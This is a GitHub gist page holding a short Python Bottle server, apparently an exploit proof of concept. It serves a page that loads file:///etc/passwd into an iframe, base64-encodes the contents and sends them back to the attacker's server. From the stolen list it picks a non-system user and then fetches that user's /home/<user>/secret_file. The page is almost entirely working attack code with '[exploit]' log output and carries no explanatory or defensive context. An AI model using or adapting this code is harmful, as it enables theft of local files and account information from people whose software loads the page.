-
-
Save csalazar/d565116fda3c4783a8caee5b50cdb020 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
from base64 import b64decode | |
from bottle import request, route, run | |
html = """ | |
<html> | |
<body> | |
<iframe id="file"></iframe> | |
<iframe id="exfil"></iframe> | |
<script> | |
var frame = document.getElementById('file'); | |
frame.src = 'file:///%s'; | |
frame.onload = function() { | |
const base64File = btoa(frame.contentDocument.body.innerHTML); | |
document.getElementById('exfil').src = "/exfil%s?data=" + base64File; | |
} | |
</script> | |
</body> | |
</html> | |
""" | |
def parse_users(data): | |
users = set([re.findall("^([^:]+):", line)[0] for line in data.splitlines()]) | |
# Default users in ubuntu 20.04 | |
system_users = { | |
"backup", "systemd-timesync", "avahi-autoipd", "cups-pk-helper", "syslog", | |
"geoclue", "gnome-initial-setup", "systemd-network", "usbmux", "vboxadd", "uuidd", | |
"redis", "bin", "pulse", "systemd-coredump", "mail", "uucp", "news", "_apt", "messagebus", | |
"proxy", "dnsmasq", "whoopsie", "www-data", "speech-dispatcher", "root", "gdm", | |
"systemd-resolve", "hplip", "sync", "avahi", "sshd", "tss", "irc", "daemon", "saned", | |
"list", "rtkit", "colord", "sys", "games", "nm-openvpn", "tcpdump", "nobody", "man", | |
"kernoops", "lp", "gnats", | |
} | |
users = list(users - system_users) | |
return users | |
@route("/") | |
def index(): | |
return html % ("/etc/passwd", 1) | |
@route("/exfil1") | |
def exfil1(): | |
data = request.query["data"] | |
decoded_data = b64decode(data).decode() | |
users = parse_users(decoded_data) | |
user = users[0] | |
target = f"/home/{users[0]}/secret_file" | |
print(f"[exploit] Detected user: {user}") | |
print(f"[exploit] Requesting path {target} ..") | |
return html % (target, 2) | |
@route("/exfil2") | |
def exfil2(): | |
data = request.query["data"] | |
decoded_data = b64decode(data).decode() | |
print(f"[exploit] Retrieved file content: {decoded_data}") | |
return "<html></html>" | |
run(host="0.0.0.0", port=8080) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment